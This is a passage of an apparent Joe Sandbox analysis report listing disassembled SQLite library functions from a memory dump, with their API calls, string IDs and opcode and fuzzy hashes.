                                  • Instruction Fuzzy Hash: 25D042B554530DABDB00CF05D8C099ABBA4FB09364F508119ED1847301C371E9608AA0
                                  Function 61E03675 Relevance: .0, Instructions: 12COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a569180d3c07d1221bfafeda3e679742bad1a28e195c91abe8c36d7a13ffb3e0
                                  • Instruction ID: 89471ba088a79177bb945e3599bbd469c52fb2d913c273ec34b5f580471c91b1
                                  • Opcode Fuzzy Hash: a569180d3c07d1221bfafeda3e679742bad1a28e195c91abe8c36d7a13ffb3e0
                                  • Instruction Fuzzy Hash: 56C08C3034430C8F6B00CEBEE840E6233E8AB48F22710C210E81CCBB10E730FC528584
                                  Function 61E03663 Relevance: .0, Instructions: 9COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 40cad0428ba2cec2f3835856280400d4fd42dbc754fd2a6d6e7cded720f8f0bd
                                  • Instruction ID: 946d1c76cfd69241ad4343530d1a2de917dfa32b8d2fe880b092a0874a41a3e0
                                  • Opcode Fuzzy Hash: 40cad0428ba2cec2f3835856280400d4fd42dbc754fd2a6d6e7cded720f8f0bd
                                  • Instruction Fuzzy Hash: BCB09B24614209465704CE549440A77779D7784945724C455981D85705E771D49151C0
                                  Function 61E39DB8 Relevance: 38.7, APIs: 16, Strings: 6, Instructions: 209COMMON
                                  Download Yara Rule
                                  APIs
                                  • sqlite3_free.SQLITE3 ref: 61E39E2A
                                  • sqlite3_snprintf.SQLITE3 ref: 61E39E5B
                                    • Part of subcall function 61E23311: sqlite3_vsnprintf.SQLITE3 ref: 61E23332
                                  • sqlite3_free.SQLITE3 ref: 61E39F9F
                                  • sqlite3_free.SQLITE3 ref: 61E39FDC
                                  • sqlite3_free.SQLITE3 ref: 61E3A017
                                  • sqlite3_snprintf.SQLITE3 ref: 61E3A049
                                  • sqlite3_randomness.SQLITE3 ref: 61E3A065
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_free$sqlite3_snprintf$sqlite3_randomnesssqlite3_vsnprintf
                                  • String ID: etilqs_$winGetTempname1$winGetTempname2$winGetTempname3$winGetTempname4$winGetTempname5
                                  • API String ID: 3041771859-3409217566
                                  • Opcode ID: a664c364bffd05e0dd8f9eca1f745ad868c69aeda89217beb5333eef611ae652
                                  • Instruction ID: 5ead169e21c47f398da408d1d1f3d61bc083bc7b06d3348ea3613649c641e8d5
                                  • Opcode Fuzzy Hash: a664c364bffd05e0dd8f9eca1f745ad868c69aeda89217beb5333eef611ae652
                                  • Instruction Fuzzy Hash: 2A815E709087528FD700AF79858036EBBE5AFC9318F65C92DE4898B345DB78C882DB56
                                  Function 61E264A9 Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 189COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_free$sqlite3_snprintf$sqlite3_mutex_entersqlite3_win32_is_nt
                                  • String ID: \$winFullPathname1$winFullPathname2$winFullPathname3$winFullPathname4
                                  • API String ID: 3752053736-2111127023
                                  • Opcode ID: 85a2622320e5ceb99c209d77fcfa26b48a81c37b6c8384df8a00d67849f76c30
                                  • Instruction ID: 702b258f710841541a62f7ae5ad9409d9e5ad47abd4fe81a02ffcb45b5e4f501
                                  • Opcode Fuzzy Hash: 85a2622320e5ceb99c209d77fcfa26b48a81c37b6c8384df8a00d67849f76c30
                                  • Instruction Fuzzy Hash: A6712870A08A859FD700EF69C49435DBBF1BF89358F64C92DE8998B341DB34C8468F56
                                  Function 61E36AF9 Relevance: 31.8, APIs: 15, Strings: 3, Instructions: 284COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_free$sqlite3_malloc64sqlite3_mprintf$sqlite3_snprintf$sqlite3_mutex_entersqlite3_mutex_leavesqlite3_strnicmp
                                  • String ID: .$sqlite3_extension_init$te3_
                                  • API String ID: 2803375525-613441610
                                  • Opcode ID: 5529e16185f8aa6e33667a67ce6690db47cf60ebdd8c2a861522ff802901c713
                                  • Instruction ID: ecb1b9b003740ba2a7be63e5d2d380d826a4db408abf7401ce153773bfe8aa38
                                  • Opcode Fuzzy Hash: 5529e16185f8aa6e33667a67ce6690db47cf60ebdd8c2a861522ff802901c713
                                  • Instruction Fuzzy Hash: 3AC1F5B0A083559FDB00DFA9D48469DBBF1AF88358F24C82AE8989B350D774D981CF52
                                  Function 61E24CA1 Relevance: 28.6, APIs: 19, Instructions: 132COMMON
                                  Download Yara Rule
                                  APIs
                                  • sqlite3_stricmp.SQLITE3 ref: 61E24CBB
                                  • sqlite3_value_numeric_type.SQLITE3 ref: 61E24CC7
                                  • sqlite3_value_int.SQLITE3 ref: 61E24CD4
                                  • sqlite3_stricmp.SQLITE3 ref: 61E24CFC
                                  • sqlite3_value_numeric_type.SQLITE3 ref: 61E24D08
                                  • sqlite3_value_int.SQLITE3 ref: 61E24D17
                                  • sqlite3_stricmp.SQLITE3 ref: 61E24D37
                                  • sqlite3_value_numeric_type.SQLITE3 ref: 61E24D43
                                  • sqlite3_value_int.SQLITE3 ref: 61E24D52
                                  • sqlite3_stricmp.SQLITE3 ref: 61E24D7E
                                  • sqlite3_value_numeric_type.SQLITE3 ref: 61E24D8A
                                  • sqlite3_value_int.SQLITE3 ref: 61E24D98
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_stricmpsqlite3_value_intsqlite3_value_numeric_type
                                  • String ID:
                                  • API String ID: 2723203140-0
                                  • Opcode ID: b8de1dbb54fff5f011ce93fe52c4387029e97006fba7536a031b2d066330c8bc
                                  • Instruction ID: 6ba9591ad8705334a4b441c0aa83940e6fc6bbfcf66dde31e84d436f967a05b2
                                  • Opcode Fuzzy Hash: b8de1dbb54fff5f011ce93fe52c4387029e97006fba7536a031b2d066330c8bc
                                  • Instruction Fuzzy Hash: 74414BB090CB868AD301AF65849065EBBF4FFC4348F35C92ED8AA8B310E778D4519B41
                                  Function 61E36656 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 342COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: memcmp$sqlite3_mprintf$sqlite3_malloc64$sqlite3_freesqlite3_vfs_find
                                  • String ID: @$access$cache
                                  • API String ID: 1538829708-1361544076
                                  • Opcode ID: 374587448939d92ee5a66507c2747f9a983a48fc21cd5dd8822d7c5042ac3afd
                                  • Instruction ID: a404acc0fa61c76f7f4c75d354b7934dbce88c6c91b1fc72bb1e74e9adc6754e
                                  • Opcode Fuzzy Hash: 374587448939d92ee5a66507c2747f9a983a48fc21cd5dd8822d7c5042ac3afd
                                  • Instruction Fuzzy Hash: 85D14DB09083A58BDB01CFA8C4807ADBBF1AF8D308F68C46ED895AB351D735D946CB51
                                  Function 61E3A4C7 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 310COMMON
                                  Download Yara Rule
                                  APIs
                                  • sqlite3_free.SQLITE3 ref: 61E3A520
                                    • Part of subcall function 61E09B73: sqlite3_mutex_enter.SQLITE3 ref: 61E09B92
                                  • sqlite3_snprintf.SQLITE3 ref: 61E3A54C
                                  • sqlite3_free.SQLITE3 ref: 61E3A57F
                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E3A59F
                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E3A5B5
                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E3A5C9
                                  • sqlite3_realloc64.SQLITE3 ref: 61E3A6AC
                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E3A7D3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_mutex_enter$sqlite3_freesqlite3_mutex_leave$sqlite3_realloc64sqlite3_snprintf
                                  • String ID: winOpenShm$winShmMap1$winShmMap2$winShmMap3
                                  • API String ID: 424382227-1629717226
                                  • Opcode ID: 9f7e7baed7ae38222fedcd3fdba458d530756995da1ea006594880bf5aec1f8a
                                  • Instruction ID: c16576b8a7adffa94e6da5f09b96fb21f24cf1bdcfeb28b6b67acb6efe012cd6
                                  • Opcode Fuzzy Hash: 9f7e7baed7ae38222fedcd3fdba458d530756995da1ea006594880bf5aec1f8a
                                  • Instruction Fuzzy Hash: EED123B4A046158FDB04DF69C48465ABBF1BFC9318F25C86DE889DB361D774D882CB82
                                  Function 61E38CB3 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 98COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_result_error$sqlite3_value_bytes$sqlite3_db_configsqlite3_freesqlite3_mprintfsqlite3_result_blobsqlite3_value_blobsqlite3_value_text
                                  • String ID: out of memory
                                  • API String ID: 2048698484-2599737071
                                  • Opcode ID: bada42216c3117378189d7d37e037a47c5ff422c4d775488b0017cc3ed939671
                                  • Instruction ID: 0e9ac9a273a3be5c4c3f0ac54ba7d767f0b0be3adca5189208b3a4a340a04fd5
                                  • Opcode Fuzzy Hash: bada42216c3117378189d7d37e037a47c5ff422c4d775488b0017cc3ed939671
                                  • Instruction Fuzzy Hash: 2141D4B09097659BCB10EF69C484A5EBBF4BF89324F21CA1DE4A49B390D334D841DF92
                                  Function 61E383AF Relevance: 18.4, APIs: 12, Instructions: 369COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_value_text$sqlite3_value_int$sqlite3_mallocsqlite3_result_error
                                  • String ID:
                                  • API String ID: 3802728871-0
                                  • Opcode ID: 4bb96df0e9ea02b8170901ff376ca01795a7f330bf45b90a118c2171c451509a
                                  • Instruction ID: 986d93c8621d22c1e3821f4a9a88547e0709dfd3bbeae8af5483fa94638b7c59
                                  • Opcode Fuzzy Hash: 4bb96df0e9ea02b8170901ff376ca01795a7f330bf45b90a118c2171c451509a
                                  • Instruction Fuzzy Hash: 121270749053298FDB50DF68C984B8DBBF1BF88314F1085AAE899E7341E7349A85DF01
                                  Function 61E37DDF Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 216COMMON
                                  Download Yara Rule
                                  APIs
                                  • sqlite3_mprintf.SQLITE3 ref: 61E37DF8
                                    • Part of subcall function 61E35932: sqlite3_initialize.SQLITE3 ref: 61E35938
                                    • Part of subcall function 61E35932: sqlite3_vmprintf.SQLITE3 ref: 61E35952
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_initializesqlite3_mprintfsqlite3_vmprintf
                                  • String ID: + $ AND $ NOT $ OR $"$(,)?
                                  • API String ID: 2841607023-3708749232
                                  • Opcode ID: 421b7e58fe59b67fc18d91f612a8f70df693ff6b2363c0b3c213e67722688da6
                                  • Instruction ID: f954bea1e517b25f1cd89783acd7ebbd91ceddcf9c0d2012b53659fe3b9d058f
                                  • Opcode Fuzzy Hash: 421b7e58fe59b67fc18d91f612a8f70df693ff6b2363c0b3c213e67722688da6
                                  • Instruction Fuzzy Hash: 2B912774A08266CFDB01CFA9C480A59FBF5BF89314F25C96DE894AB351D335D841CBA2
                                  Function 61E25E92 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 168COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_snprintf$sqlite3_result_textsqlite3_result_value
                                  • String ID: NULL
                                  • API String ID: 336169149-324932091
                                  • Opcode ID: cd2d0b220e9fe2a60919f3565b0d02ed4481aad89998ffd588daf0d896c8c80d
                                  • Instruction ID: 76aad4926f9cdc6ce2b236da1c08f74fdf59268def3ce4266b134a5fec0b0963
                                  • Opcode Fuzzy Hash: cd2d0b220e9fe2a60919f3565b0d02ed4481aad89998ffd588daf0d896c8c80d
                                  • Instruction Fuzzy Hash: 0C6190B09083C58ED7119F68C8A4B59BFF2AF89318F29CA5CD4D84B396D739C845DB42
                                  Function 61E1D8F3 Relevance: 16.9, APIs: 3, Strings: 8, Instructions: 358stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: strncmp
                                  • String ID: -$-$0$]$false$null$true$}
                                  • API String ID: 1114863663-1443276563
                                  • Opcode ID: 2d8f4ad17957d192658b6d5a2df88e89c47a4fcf74da8d86e228ce30a68b010c
                                  • Instruction ID: e6771dfb145aaa4d20fa7767e438eac79a16df9819e23ad06bc229398806a484
                                  • Opcode Fuzzy Hash: 2d8f4ad17957d192658b6d5a2df88e89c47a4fcf74da8d86e228ce30a68b010c
                                  • Instruction Fuzzy Hash: 90D10878A0C6854EDB16CFACC08A7A9BBF3BB45318F68C659C4959738EC3B8D446C741
                                  Function 61E391A1 Relevance: 16.7, APIs: 11, Instructions: 192COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 61E0A16B: sqlite3_free.SQLITE3 ref: 61E0A17A
                                    • Part of subcall function 61E0A16B: sqlite3_free.SQLITE3 ref: 61E0A185
                                  • sqlite3_value_text.SQLITE3 ref: 61E391CE
                                  • sqlite3_value_bytes.SQLITE3 ref: 61E391E1
                                  • sqlite3_malloc64.SQLITE3 ref: 61E391F6
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
